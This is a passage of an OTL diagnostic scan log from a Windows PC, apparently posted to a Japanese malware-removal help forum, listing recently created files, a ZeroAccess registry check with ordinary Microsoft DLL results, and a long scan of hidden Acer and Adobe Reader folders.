[2015/09/09 15:13:35 | 000,002,606 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:39:07 | 000,002,265 | ---- | C] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 16:13:27 | 564,744,309 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:07 | 002,582,815 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/03 15:34:50 | 000,000,690 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/03 15:34:50 | 000,000,686 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/08/24 15:09:30 | 000,001,787 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/08/18 13:56:19 | 000,002,094 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
[2015/05/18 17:32:28 | 000,000,000 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Temp.dat
[2015/05/06 07:26:47 | 000,000,079 | ---- | C] () -- C:\Program Files (x86)\prefs.js
[2014/12/13 21:29:15 | 000,007,605 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Resmon.ResmonCfg
[2014/08/08 10:28:32 | 000,226,680 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/08/08 10:28:30 | 000,076,152 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/06/07 02:39:33 | 000,001,525 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\recently-used.xbel
[2014/05/23 00:34:21 | 000,000,347 | ---- | C] () -- C:\Users\【ユーザー名】\コンピューター - ショートカット.lnk
[2014/05/11 21:45:24 | 000,002,549 | ---- | C] () -- C:\Windows\wininit.ini
  • あすとろ
  • 2015/09/15 (Tue) 11:57:53
OTL2
This is filler text.

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 12:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]
[2013/08/08 09:40:21 | 000,000,000 | -H-D | M] -- C:\book
[2013/08/08 09:37:05 | 000,000,000 | -H-D | M] -- C:\Intel
[2014/04/01 21:30:57 | 000,000,000 | -H-D | M] -- C:\OEM
[2015/09/13 01:41:08 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2014/04/02 15:30:11 | 000,000,000 | -H-D | M] -- C:\OEM\Registration
[2014/04/02 21:26:28 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\InstallShield Installation Information
[2013/08/08 09:47:02 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Temp
[2012/06/20 12:12:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\OOBEOffer\res\ThirdParty\Norton
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer
[2012/06/20 11:59:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Languages
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Pictures
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Settings
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Common
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\120
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\144
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Acer
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Black
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Blue
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\eMachines
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gateway
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Generic
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gray
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Green
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Packard Bell
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates
[2014/04/08 15:27:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Javascripts
[2015/09/07 23:07:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Tracker
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DAN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DEU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ENU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ESP
[2012/06/20 12:06:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\EUQ
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HUN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ITA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\JPN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\KOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NLD
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\POL
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SLV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SUO
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\UKR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES
[2015/09/07 23:07:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI
